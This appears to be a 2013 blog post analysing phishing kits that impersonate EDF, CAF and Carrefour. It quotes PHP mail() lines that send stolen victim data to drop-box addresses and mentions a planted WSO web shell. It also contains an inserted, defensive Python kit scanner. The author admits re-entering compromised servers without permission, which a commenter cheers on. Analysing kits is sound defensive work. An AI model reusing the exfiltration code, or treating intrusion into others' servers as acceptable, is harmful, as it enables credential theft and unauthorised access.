Monday 4 February 2013

Phish-BankFraud (EDF, CAF, and now Carrefour)

These days they do EDF and CAF, and are back with Carrefour.

EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33

bigcave.php:
$send = "Ayoub.boos7@hotmai1.fr";   // drop-box address (note the digit 1 in "hotmai1")
$subject = "EDF : $ip";             // victim IP goes in the subject line
$from = "From: Tool4Spam.Com";      // spam-tool signature in the From header

mail($send,$subject,$message,$from);           // mail body ($message, built elsewhere in the kit) sent to the drop box
mail("z0ba@live.com",$subject,$message,$from); // and a copy to a second address

Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024

The mechanism is interesting on this one:

It extracts a zip file into a freshly created directory and writes the EDF customer's IP to Vcounter.txt.

Seems the bad guys tested it to see if everything works :)
It's always these 41.x IPs from Morocco.
(Cf. the access logs at http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)

The bad guys left Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:

'Nice'

Spamtool:

And some other crap...
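As an added example (not from the post or from the kit itself), a small Python triage scanner that flags the kit indicators described above in a PHP file: hardcoded mail() drop-box addresses, the spam-tool From header, the Vcounter.txt write and the zip extraction. The PHP sample it runs on is constructed for the example, and the letter/digit lookalike-domain check is a heuristic assumption, not something the post states.

```python
import re

# Constructed sample (hypothetical, modelled on the mailer excerpt quoted
# above, not the real bigcave.php) used to exercise the scanner offline.
SAMPLE_PHP = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$zip = new ZipArchive();
$zip->open('pages.zip');
$zip->extractTo($dir);
file_put_contents("Vcounter.txt", $ip . "\n", FILE_APPEND);
$send = "Ayoub.boos7@hotmai1.fr";
$subject = "EDF : $ip";
$from = "From: Tool4Spam.Com";
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
?>'''

EMAIL_RE = r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'

def scan_php_source(src):
    """Return phishing-kit indicators found in PHP source (heuristic triage)."""
    # Resolve simple string assignments so mail($send, ...) yields the literal.
    literals = dict(re.findall(r'\$(\w+)\s*=\s*["\']([^"\']*)["\']', src))
    recipients = []
    for arg in re.findall(r'\bmail\s*\(\s*([^,]+),', src):
        arg = arg.strip()
        if arg.startswith('$'):            # variable: look up its literal value
            arg = literals.get(arg[1:], '')
        recipients += re.findall(EMAIL_RE, arg)
    # Heuristic: a domain label mixing letters and digits (hotmai1.fr, a digit 1
    # standing in for the l of hotmail) is treated as a lookalike domain.
    lookalike = [a.split('@')[1] for a in recipients
                 if any(re.search(r'(?i)[a-z]\d|\d[a-z]', lbl)
                        for lbl in a.split('@')[1].split('.')[:-1])]
    return {
        'recipients': sorted(set(recipients)),
        'lookalike_domains': sorted(set(lookalike)),
        'from_headers': [v for v in literals.values()
                         if v.lower().startswith('from:')],
        'victim_logs': re.findall(
            r'(?:file_put_contents|fopen)\s*\(\s*["\']([^"\']+)["\']', src),
        'unpacks_zip': bool(re.search(r'ZipArchive|extractTo', src)),
    }

def is_kit_like(findings):
    """Flag a file that mails to hardcoded addresses and also unpacks or logs."""
    return bool(findings['recipients']) and (
        findings['unpacks_zip'] or bool(findings['victim_logs']))

if __name__ == '__main__':
    for key, value in scan_php_source(SAMPLE_PHP).items():
        print(f'{key}: {value}')
```

Run it over every .php file under a web root after an incident to list drop-box addresses worth reporting to the mail providers.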

For CAF and Carrefour they did not use hijacked servers (only for the redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804

The CAF mail is just a big failure:

Bank customers replying to the phishing e-mail:

A new tool appeared; phishers will probably be interested.

Also I got an interesting mail:
That becomes a problem when hackers use hijacked servers (especially for phishing and malware hosting).
I consider myself borderline: I re-break these servers with my real IP to get the malicious stuff.
I leave files untouched, including the hackers' files; sometimes I probably make more of a mess than them in the log files, I don't edit them to hide my IP.
I have never been sued for hacking a compromised machine and I hope that will not happen.

2 comments:

  1. Hope you won't get sued for your interesting work.

  2. They don't even notice that their server is compromised, so as for them noticing that you came by for a visit... you can rest easy :)
    In any case keep it up, your articles are really nice!
